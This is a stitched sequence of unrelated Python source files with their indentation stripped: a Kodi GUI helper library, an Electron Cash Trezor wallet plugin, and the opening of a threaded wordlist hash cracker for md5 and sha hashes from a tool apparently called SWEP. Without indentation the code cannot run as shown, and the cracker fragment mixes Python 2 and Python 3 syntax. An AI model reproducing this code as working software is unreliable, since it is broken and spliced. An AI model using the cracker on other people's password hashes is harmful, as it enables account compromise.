return self._closing
@classmethod
def generate(self):
return None
def setProperties(self, prop_list, val_list_or_val):
if isinstance(val_list_or_val, (list, tuple)):
val_list = val_list_or_val
else:
val_list = [val_list_or_val] * len(prop_list)
for prop, val in zip(prop_list, val_list):
self.setProperty(prop, val)
def propertyContext(self, prop, val='1'):
return WindowProperty(self, prop, val)
def setBoolProperty(self, key, boolean):
self.setProperty(key, boolean and '1' or '')
class BaseWindow(xbmcgui.WindowXML, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = None
self.started = False
self.finishedInit = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
self.finishedInit = True
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXML.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseWindow.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
if not self.isOpen:
return
self._closing = True
self.isOpen = False
self.close()
def show(self):
self._closing = False
self.isOpen = True
xbmcgui.WindowXML.show(self)
def onClosed(self):
pass
class BaseDialog(xbmcgui.WindowXMLDialog, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = ''
self.started = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowDialogId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowDialogId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXMLDialog.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseDialog.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
self._closing = True
self.close()
def show(self):
self._closing = False
xbmcgui.WindowXMLDialog.show(self)
def onClosed(self):
pass
class ControlledBase:
def doModal(self):
self.show()
self.wait()
def wait(self):
while not self._closing and not MONITOR.waitForAbort(0.1):
pass
def close(self):
self._closing = True
class ControlledWindow(ControlledBase, BaseWindow):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseWindow.onAction(self, action)
class ControlledDialog(ControlledBase, BaseDialog):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseDialog.onAction(self, action)
DUMMY_LIST_ITEM = xbmcgui.ListItem()
class ManagedListItem(object):
def __init__(self, label='', label2='', iconImage='', thumbnailImage='', path='', data_source=None, properties=None):
self._listItem = xbmcgui.ListItem(label, label2, iconImage, thumbnailImage, path)
self.dataSource = data_source
self.properties = {}
self.label = label
self.label2 = label2
self.iconImage = iconImage
self.thumbnailImage = thumbnailImage
self.path = path
self._ID = None
self._manager = None
self._valid = True
if properties:
for k, v in properties.items():
self.setProperty(k, v)
def __nonzero__(self):
return self._valid
@property
def listItem(self):
if not self._listItem:
if not self._manager:
return None
try:
self._listItem = self._manager.getListItemFromManagedItem(self)
except RuntimeError:
return None
return self._listItem
def invalidate(self):
self._valid = False
self._listItem = DUMMY_LIST_ITEM
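# Hand ownership of the underlying xbmcgui.ListItem to a manager; the '__ID__' property lets the manager map control items back to managed items.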
def _takeListItem(self, manager, lid):
self._manager = manager
self._ID = lid
self._listItem.setProperty('__ID__', lid)
li = self._listItem
self._listItem = None
self._manager._properties.update(self.properties)
return li
def _updateListItem(self):
self.listItem.setProperty('__ID__', self._ID)
self.listItem.setLabel(self.label)
self.listItem.setLabel2(self.label2)
self.listItem.setIconImage(self.iconImage)
self.listItem.setThumbnailImage(self.thumbnailImage)
self.listItem.setPath(self.path)
for k in self._manager._properties.keys():
self.listItem.setProperty(k, self.properties.get(k) or '')
def clear(self):
self.label = ''
self.label2 = ''
self.iconImage = ''
self.thumbnailImage = ''
self.path = ''
for k in self.properties:
self.properties[k] = ''
self._updateListItem()
def pos(self):
if not self._manager:
return None
return self._manager.getManagedItemPosition(self)
def addContextMenuItems(self, items, replaceItems=False):
self.listItem.addContextMenuItems(items, replaceItems)
def addStreamInfo(self, stype, values):
self.listItem.addStreamInfo(stype, values)
def getLabel(self):
return self.label
def getLabel2(self):
return self.label2
def getProperty(self, key):
return self.properties.get(key, '')
def getdescription(self):
return self.listItem.getdescription()
def getduration(self):
return self.listItem.getduration()
def getfilename(self):
return self.listItem.getfilename()
def isSelected(self):
return self.listItem.isSelected()
def select(self, selected):
return self.listItem.select(selected)
def setArt(self, values):
return self.listItem.setArt(values)
def setIconImage(self, icon):
self.iconImage = icon
return self.listItem.setIconImage(icon)
def setInfo(self, itype, infoLabels):
return self.listItem.setInfo(itype, infoLabels)
def setLabel(self, label):
self.label = label
return self.listItem.setLabel(label)
def setLabel2(self, label):
self.label2 = label
return self.listItem.setLabel2(label)
def setMimeType(self, mimetype):
return self.listItem.setMimeType(mimetype)
def setPath(self, path):
self.path = path
return self.listItem.setPath(path)
def setProperty(self, key, value):
if self._manager:
self._manager._properties[key] = 1
self.properties[key] = value
self.listItem.setProperty(key, value)
return self
def setBoolProperty(self, key, boolean):
return self.setProperty(key, boolean and '1' or '')
def setSubtitles(self, subtitles):
return self.listItem.setSubtitles(subtitles) # List of strings - HELIX
def setThumbnailImage(self, thumb):
self.thumbnailImage = thumb
return self.listItem.setThumbnailImage(thumb)
def onDestroy(self):
pass
class ManagedControlList(object):
def __init__(self, window, control_id, max_view_index, data_source=None):
self.controlID = control_id
self.control = window.getControl(control_id)
self.items = []
self._sortKey = None
self._idCounter = 0
self._maxViewIndex = max_view_index
self._properties = {}
self.dataSource = data_source
def __getattr__(self, name):
return getattr(self.control, name)
def __getitem__(self, idx):
if isinstance(idx, slice):
return self.items[idx]
else:
return self.getListItem(idx)
def __iter__(self):
for i in self.items:
yield i
def __len__(self):
return self.size()
def _updateItems(self, bottom=None, top=None):
if bottom is None:
bottom = 0
top = self.size()
try:
for idx in range(bottom, top):
li = self.control.getListItem(idx)
mli = self.items[idx]
self._properties.update(mli.properties)
mli._manager = self
mli._listItem = li
mli._updateListItem()
except RuntimeError:
xbmc.log('kodigui.ManagedControlList._updateItems: Runtime error', xbmc.LOGNOTICE)
return False
return True
def _nextID(self):
self._idCounter += 1
return str(self._idCounter)
def reInit(self, window, control_id):
self.controlID = control_id
self.control = window.getControl(control_id)
self.control.addItems([i._takeListItem(self, self._nextID()) for i in self.items])
def setSort(self, sort):
self._sortKey = sort
def addItem(self, managed_item):
self.items.append(managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
def addItems(self, managed_items):
self.items += managed_items
self.control.addItems([i._takeListItem(self, self._nextID()) for i in managed_items])
def replaceItem(self, pos, mli):
self[pos].onDestroy()
self[pos].invalidate()
self.items[pos] = mli
li = self.control.getListItem(pos)
mli._manager = self
mli._listItem = li
mli._updateListItem()
def replaceItems(self, managed_items):
if not self.items:
self.addItems(managed_items)
return True
oldSize = self.size()
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = managed_items
size = self.size()
if size != oldSize:
pos = self.getSelectedPosition()
if size > oldSize:
for i in range(0, size - oldSize):
self.control.addItem(xbmcgui.ListItem())
elif size < oldSize:
diff = oldSize - size
idx = oldSize - 1
while diff:
self.control.removeItem(idx)
idx -= 1
diff -= 1
if self.positionIsValid(pos):
self.selectItem(pos)
elif pos >= size:
self.selectItem(size - 1)
self._updateItems(0, self.size())
def getListItem(self, pos):
li = self.control.getListItem(pos)
mli = self.items[pos]
mli._listItem = li
return mli
def getListItemByDataSource(self, data_source):
for mli in self:
if data_source == mli.dataSource:
return mli
return None
def getSelectedItem(self):
pos = self.control.getSelectedPosition()
if not self.positionIsValid(pos):
pos = self.size() - 1
if pos < 0:
return None
return self.getListItem(pos)
def removeItem(self, index):
old = self.items.pop(index)
old.onDestroy()
old.invalidate()
self.control.removeItem(index)
top = self.control.size() - 1
if top < 0:
return
if top < index:
index = top
self.control.selectItem(index)
def removeManagedItem(self, mli):
self.removeItem(mli.pos())
def insertItem(self, index, managed_item):
pos = self.getSelectedPosition() + 1
if index >= self.size() or index < 0:
self.addItem(managed_item)
else:
self.items.insert(index, managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
self._updateItems(index, self.size())
if self.positionIsValid(pos):
self.selectItem(pos)
def moveItem(self, mli, dest_idx):
source_idx = mli.pos()
if source_idx < dest_idx:
rstart = source_idx
rend = dest_idx + 1
# dest_idx-=1
else:
rstart = dest_idx
rend = source_idx + 1
mli = self.items.pop(source_idx)
self.items.insert(dest_idx, mli)
self._updateItems(rstart, rend)
def swapItems(self, pos1, pos2):
if not self.positionIsValid(pos1) or not self.positionIsValid(pos2):
return False
item1 = self.items[pos1]
item2 = self.items[pos2]
li1 = item1._listItem
li2 = item2._listItem
item1._listItem = li2
item2._listItem = li1
item1._updateListItem()
item2._updateListItem()
self.items[pos1] = item2
self.items[pos2] = item1
return True
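# Scroll the visible window by 'shift' rows: select an item pushed past the view edge, then optionally restore the original selection.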
def shiftView(self, shift, hold_selected=False):
if not self._maxViewIndex:
return
selected = self.getSelectedItem()
selectedPos = selected.pos()
viewPos = self.getViewPosition()
if shift > 0:
pushPos = selectedPos + (self._maxViewIndex - viewPos) + shift
if pushPos >= self.size():
pushPos = self.size() - 1
self.selectItem(pushPos)
newViewPos = self._maxViewIndex
elif shift < 0:
pushPos = (selectedPos - viewPos) + shift
if pushPos < 0:
pushPos = 0
self.selectItem(pushPos)
newViewPos = 0
if hold_selected:
self.selectItem(selected.pos())
else:
diff = newViewPos - viewPos
fix = pushPos - diff
# print '{0} {1} {2}'.format(newViewPos, viewPos, fix)
if self.positionIsValid(fix):
self.selectItem(fix)
def reset(self):
self.dataSource = None
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = []
self.control.reset()
def size(self):
return len(self.items)
def getViewPosition(self):
try:
return int(xbmc.getInfoLabel('Container({0}).Position'.format(self.controlID)))
except:
return 0
def getViewRange(self):
viewPosition = self.getViewPosition()
selected = self.getSelectedPosition()
return range(max(selected - viewPosition, 0), min(selected + (self._maxViewIndex - viewPosition) + 1, self.size() - 1))
def positionIsValid(self, pos):
return 0 <= pos < self.size()
def sort(self, sort=None, reverse=False):
sort = sort or self._sortKey
self.items.sort(key=sort, reverse=reverse)
self._updateItems(0, self.size())
def reverse(self):
self.items.reverse()
self._updateItems(0, self.size())
def getManagedItemPosition(self, mli):
return self.items.index(mli)
def getListItemFromManagedItem(self, mli):
pos = self.items.index(mli)
return self.control.getListItem(pos)
def topHasFocus(self):
return self.getSelectedPosition() == 0
def bottomHasFocus(self):
return self.getSelectedPosition() == self.size() - 1
def invalidate(self):
for item in self.items:
item._listItem = DUMMY_LIST_ITEM
def newControl(self, window=None, control_id=None):
self.controlID = control_id or self.controlID
self.control = window.getControl(self.controlID)
self.control.addItems([xbmcgui.ListItem() for i in range(self.size())])
self._updateItems()
class _MWBackground(ControlledWindow):
def __init__(self, *args, **kwargs):
self._multiWindow = kwargs.get('multi_window')
self.started = False
BaseWindow.__init__(self, *args, **kwargs)
def onInit(self):
if self.started:
return
self.started = True
self._multiWindow._open()
self.close()
class MultiWindow(object):
def __init__(self, windows=None, default_window=None, **kwargs):
self._windows = windows
self._next = default_window or self._windows[0]
self._properties = {}
self._current = None
self._allClosed = False
self.exitCommand = None
def __getattr__(self, name):
return getattr(self._current, name)
def setWindows(self, windows):
self._windows = windows
def setDefault(self, default):
self._next = default or self._windows[0]
def windowIndex(self, window):
if hasattr(window, 'MULTI_WINDOW_ID'):
for i, w in enumerate(self._windows):
if window.MULTI_WINDOW_ID == w.MULTI_WINDOW_ID:
return i
return 0
else:
return self._windows.index(window.__class__)
def nextWindow(self, window=None):
if window is False:
window = self._windows[self.windowIndex(self._current)]
if window:
if window.__class__ == self._current.__class__:
return None
else:
idx = self.windowIndex(self._current)
idx += 1
if idx >= len(self._windows):
idx = 0
window = self._windows[idx]
self._next = window
self._current.doClose()
return self._next
def _setupCurrent(self, cls):
self._current = cls(cls.xmlFile, cls.path, cls.theme, cls.res)
self._current.onFirstInit = self._onFirstInit
self._current.onReInit = self.onReInit
self._current.onClick = self.onClick
self._current.onFocus = self.onFocus
self._currentOnAction = self._current.onAction
self._current.onAction = self.onAction
@classmethod
def open(cls, **kwargs):
mw = cls(**kwargs)
b = _MWBackground(mw.bgXML, mw.path, mw.theme, mw.res, multi_window=mw)
b.modal()
del b
import gc
gc.collect(2)
return mw
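# Cycle windows until doClose() sets _allClosed; nextWindow() closes the current window and this loop re-opens whichever one was requested next.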
def _open(self):
while not xbmc.abortRequested and not self._allClosed:
self._setupCurrent(self._next)
self._current.modal()
self._current.doClose()
del self._current
del self._next
del self._currentOnAction
def setProperty(self, key, value):
self._properties[key] = value
self._current.setProperty(key, value)
def _onFirstInit(self):
for k, v in self._properties.items():
self._current.setProperty(k, v)
self.onFirstInit()
def doClose(self):
self._allClosed = True
self._current.doClose()
def onFirstInit(self):
pass
def onReInit(self):
pass
def onAction(self, action):
if action == xbmcgui.ACTION_PREVIOUS_MENU or action == xbmcgui.ACTION_NAV_BACK:
self.doClose()
self._currentOnAction(action)
def onClick(self, controlID):
pass
def onFocus(self, controlID):
pass
class SafeControlEdit(object):
CHARS_LOWER = 'abcdefghijklmnopqrstuvwxyz'
CHARS_UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
CHARS_NUMBERS = '0123456789'
CURSOR = '[COLOR FFCC7B19]|[/COLOR]'
def __init__(self, control_id, label_id, window, key_callback=None, grab_focus=False):
self.controlID = control_id
self.labelID = label_id
self._win = window
self._keyCallback = key_callback
self.grabFocus = grab_focus
self._text = ''
self.setup()
def setup(self):
self._labelControl = self._win.getControl(self.labelID)
self._winOnAction = self._win.onAction
self._win.onAction = self.onAction
self.updateLabel()
def onAction(self, action):
try:
controlID = self._win.getFocusId()
if controlID == self.controlID:
if self.processAction(action.getId()):
return
elif self.grabFocus:
if self.processOffControlAction(action.getButtonCode()):
self._win.setFocusId(self.controlID)
return
except:
traceback.print_exc()
self._winOnAction(action)
def processAction(self, action_id):
if 61793 <= action_id <= 61818: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61793])
elif 61761 <= action_id <= 61786: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 61761])
elif 61744 <= action_id <= 61753:
self.processChar(self.CHARS_NUMBERS[action_id - 61744])
elif action_id == 61728: # Space
self.processChar(' ')
elif action_id == 61448:
self.delete()
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def processOffControlAction(self, action_id):
if 61505 <= action_id <= 61530: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61505])
elif 192577 <= action_id <= 192602: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 192577])
elif 61488 <= action_id <= 61497:
self.processChar(self.CHARS_NUMBERS[action_id - 61488])
elif 61552 <= action_id <= 61561:
self.processChar(self.CHARS_NUMBERS[action_id - 61552])
elif action_id == 61472: # Space
self.processChar(' ')
# elif action_id == 61448:
# self.delete()
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def updateLabel(self):
self._labelControl.setLabel(self._text + self.CURSOR)
def processChar(self, char):
self._text += char
self.updateLabel()
def setText(self, text):
self._text = text
self.updateLabel()
def getText(self):
return self._text
def append(self, text):
self._text += text
self.updateLabel()
def delete(self):
self._text = self._text[:-1]
self.updateLabel()
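# PropertyTimer: after 'timeout' seconds, set a window property to 'value' (e.g. to auto-hide a UI element), optionally closing a window and firing a callback.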
class PropertyTimer():
def __init__(self, window_id, timeout, property_, value='', init_value='1', addon_id=None, callback=None):
self._winID = window_id
self._timeout = timeout
self._property = property_
self._value = value
self._initValue = init_value
self._endTime = 0
self._thread = None
self._addonID = addon_id
self._closeWin = None
self._closed = False
self._callback = callback
def _onTimeout(self):
self._endTime = 0
xbmcgui.Window(self._winID).setProperty(self._property, self._value)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), self._value)
if self._closeWin:
self._closeWin.doClose()
if self._callback:
self._callback()
def _wait(self):
while not xbmc.abortRequested and time.time() < self._endTime:
xbmc.sleep(100)
if xbmc.abortRequested:
return
if self._endTime == 0:
return
self._onTimeout()
def _stopped(self):
return not self._thread or not self._thread.isAlive()
def _reset(self):
self._endTime = time.time() + self._timeout
def _start(self):
self.init(self._initValue)
self._thread = threading.Thread(target=self._wait)
self._thread.start()
def stop(self, trigger=False):
self._endTime = trigger and 1 or 0
if not self._stopped():
self._thread.join()
def close(self):
self._closed = True
self.stop()
def init(self, val):
if val is False:
return
elif val is None:
val = self._initValue
xbmcgui.Window(self._winID).setProperty(self._property, val)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), val)
def reset(self, close_win=None, init=None):
self.init(init)
if self._closed:
return
if not self._timeout:
return
self._closeWin = close_win
self._reset()
if self._stopped():
self._start()
class WindowProperty():
def __init__(self, win, prop, val='1', end=None):
self.win = win
self.prop = prop
self.val = val
self.end = end
self.old = self.win.getProperty(self.prop)
def __enter__(self):
self.win.setProperty(self.prop, self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
self.win.setProperty(self.prop, self.end or self.old)
class GlobalProperty():
def __init__(self, prop, val='1', end=None):
import xbmcaddon
self._addonID = xbmcaddon.Addon().getAddonInfo('id')
self.prop = prop
self.val = val
self.end = end
self.old = xbmc.getInfoLabel('Window(10000).Property({0}.{1})'.format(self._addonID, prop))
def __enter__(self):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.end or self.old)
|
plugin.py | import threading
from binascii import hexlify, unhexlify
from electroncash.util import bfh, bh2u
from electroncash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electroncash.i18n import _
from electroncash.networks import NetworkConstants
from electroncash.plugins import BasePlugin
from electroncash.transaction import deserialize
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
try:
return self.hid_transport(device)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never return when a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
# Note: testnet supported only by unofficial firmware
return "Bcash Testnet" if NetworkConstants.TESTNET else "Bcash"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
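# Run device initialization on a worker thread so the wizard's Qt event loop keeps pumping; _initialize_device calls wizard.loop.exit(0) when finished.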
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
        '''Called when creating a new wallet. Select the device to use. If
        the device is uninitialized, go through the initialization
        process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey('standard', bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address.to_ui_string()[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address.to_string(address.FMT_LEGACY)
outputs.append(txoutputtype)
return outputs
def electroncash_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electroncash_tx_to_txtype(tx)
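    # e.g. during sign_tx the trezor library requests, via tx_api, each previous
    # transaction it needs; get_tx(tx_hash) serves it from the prev_tx cache
    # populated by sign_transaction above.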
|
HashCracker.py | import hashlib
import threading
import queue
import time
def info():
info = {
'name': 'hash',
'path': 'HashCracker',
'fullname': 'SWEP HASH CRACKER',
'description': 'Hash cracker. Supports md5 and all sha types.',
'parameters':{
'Hash': 'Hash to crack',
'mode': 'Hash mode',
'FileName': 'Wordlist name.',
'Thread': 'Threads. Default: 10'
},
'author': 'BREACHERS security',
'date': '2019-01-26'
}
return info
class Scanner():
def __init__(self):
self.TaskList = []
self.Thread = 10
self.Queue = queue.Queue()
self.Hash = None
self.Status = False
self.PlainText = ''
self.mode = 'md5'
self.FileName = '/home/nimda/swep/WordLists/100000.txt'
pass
    def CrackHash(self, *hash):
        # Accept the hash as an optional positional argument; the original
        # **hash signature made hash[0] raise a KeyError.
        if not hash:
            if not self.Hash:
                print '[!] Hash not specified.'
                return
        else:
            self.Hash = hash[0]
        with open(self.FileName, 'r') as fp:
            for item in fp.read().split('\n'):
                self.Queue.put(item)
self.Status = True
